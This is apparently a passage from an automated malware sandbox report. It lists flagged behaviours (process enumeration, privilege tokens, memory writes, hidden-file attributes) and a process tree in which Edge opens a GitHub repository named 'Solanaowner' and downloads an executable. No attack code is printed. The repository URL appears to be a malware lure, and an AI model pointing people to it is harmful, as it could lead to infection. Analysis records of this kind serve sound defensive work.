5208	PING.EXE

Suspicious behavior: EnumeratesProcesses 58 IoCs

pid	Process
2924	msedge.exe
2924	msedge.exe
3128	msedge.exe
3128	msedge.exe
4576	identity_helper.exe
4576	identity_helper.exe
3612	msedge.exe
3612	msedge.exe
3844	msedge.exe
3844	msedge.exe
4364	msedge.exe
4364	msedge.exe
4372	msedge.exe
4372	msedge.exe
4412	msedge.exe
4412	msedge.exe
4412	msedge.exe
4412	msedge.exe
436	msedge.exe
436	msedge.exe
2668	powershell.exe
2668	powershell.exe
2668	powershell.exe
2956	powershell.exe
2956	powershell.exe
1252	powershell.exe
1252	powershell.exe
5436	powershell.exe
5436	powershell.exe
1252	powershell.exe
1252	powershell.exe
2956	powershell.exe
2956	powershell.exe
5676	powershell.exe
5676	powershell.exe
5676	powershell.exe
5436	powershell.exe
4116	powershell.exe
4116	powershell.exe
3452	powershell.exe
3452	powershell.exe
5160	powershell.exe
5160	powershell.exe
3840	powershell.exe
3840	powershell.exe
6004	msedge.exe
6004	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
5372	identity_helper.exe
5372	identity_helper.exe
1148	msedge.exe
1148	msedge.exe
5508	msedge.exe
5508	msedge.exe
5508	msedge.exe
5508	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 57 IoCs

pid	Process
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1304	7zG.exe
Token: 35	1304	7zG.exe
Token: SeSecurityPrivilege	1304	7zG.exe
Token: SeSecurityPrivilege	1304	7zG.exe
Token: SeRestorePrivilege	1160	7zG.exe
Token: 35	1160	7zG.exe
Token: SeSecurityPrivilege	1160	7zG.exe
Token: SeSecurityPrivilege	1160	7zG.exe
Token: SeRestorePrivilege	2860	7zG.exe
Token: 35	2860	7zG.exe
Token: SeSecurityPrivilege	2860	7zG.exe
Token: SeSecurityPrivilege	2860	7zG.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	732	tasklist.exe
Token: SeDebugPrivilege	3480	tasklist.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	5424	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5516	WMIC.exe
Token: SeSecurityPrivilege	5516	WMIC.exe
Token: SeTakeOwnershipPrivilege	5516	WMIC.exe
Token: SeLoadDriverPrivilege	5516	WMIC.exe
Token: SeSystemProfilePrivilege	5516	WMIC.exe
Token: SeSystemtimePrivilege	5516	WMIC.exe
Token: SeProfSingleProcessPrivilege	5516	WMIC.exe
Token: SeIncBasePriorityPrivilege	5516	WMIC.exe
Token: SeCreatePagefilePrivilege	5516	WMIC.exe
Token: SeBackupPrivilege	5516	WMIC.exe
Token: SeRestorePrivilege	5516	WMIC.exe
Token: SeShutdownPrivilege	5516	WMIC.exe
Token: SeDebugPrivilege	5516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5516	WMIC.exe
Token: SeRemoteShutdownPrivilege	5516	WMIC.exe
Token: SeUndockPrivilege	5516	WMIC.exe
Token: SeManageVolumePrivilege	5516	WMIC.exe
Token: 33	5516	WMIC.exe
Token: 34	5516	WMIC.exe
Token: 35	5516	WMIC.exe
Token: 36	5516	WMIC.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeIncreaseQuotaPrivilege	5516	WMIC.exe
Token: SeSecurityPrivilege	5516	WMIC.exe
Token: SeTakeOwnershipPrivilege	5516	WMIC.exe
Token: SeLoadDriverPrivilege	5516	WMIC.exe
Token: SeSystemProfilePrivilege	5516	WMIC.exe
Token: SeSystemtimePrivilege	5516	WMIC.exe
Token: SeProfSingleProcessPrivilege	5516	WMIC.exe
Token: SeIncBasePriorityPrivilege	5516	WMIC.exe
Token: SeCreatePagefilePrivilege	5516	WMIC.exe
Token: SeBackupPrivilege	5516	WMIC.exe
Token: SeRestorePrivilege	5516	WMIC.exe
Token: SeShutdownPrivilege	5516	WMIC.exe
Token: SeDebugPrivilege	5516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5516	WMIC.exe
Token: SeRemoteShutdownPrivilege	5516	WMIC.exe
Token: SeUndockPrivilege	5516	WMIC.exe
Token: SeManageVolumePrivilege	5516	WMIC.exe
Token: 33	5516	WMIC.exe
Token: 34	5516	WMIC.exe
Token: 35	5516	WMIC.exe
Token: 36	5516	WMIC.exe
Token: SeDebugPrivilege	5676	powershell.exe
Token: SeDebugPrivilege	5228	tasklist.exe
Token: SeDebugPrivilege	5832	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
1304	7zG.exe
1160	7zG.exe
2860	7zG.exe
916	Client.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
3128	msedge.exe
916	Client.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe
1016	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4372	msedge.exe
436	msedge.exe
1148	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3128 wrote to memory of 4468	3128	msedge.exe	84
PID 3128 wrote to memory of 4468	3128	msedge.exe	84
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2244	3128	msedge.exe	85
PID 3128 wrote to memory of 2924	3128	msedge.exe	86
PID 3128 wrote to memory of 2924	3128	msedge.exe	86
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87
PID 3128 wrote to memory of 3420	3128	msedge.exe	87

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2900	attrib.exe
6100	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Solanaowner11/Solanaowner
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe396646f8,0x7ffe39664708,0x7ffe39664718
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:2924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4168 /prefetch:8
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6180 /prefetch:8
  2⤵
  PID:728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
  2⤵
  PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
  2⤵
  PID:3360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
  2⤵
  PID:836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
  2⤵
  PID:1192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  2⤵
  PID:512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:1
  2⤵
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
  2⤵
  PID:3876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3924 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2116,6574224005657360401,1321798872444438788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2236

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1800

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" t -an -ai#7zMap10560:92:7zEvent32627
1⤵
- Suspicious use of AdjustPrivilegeToken
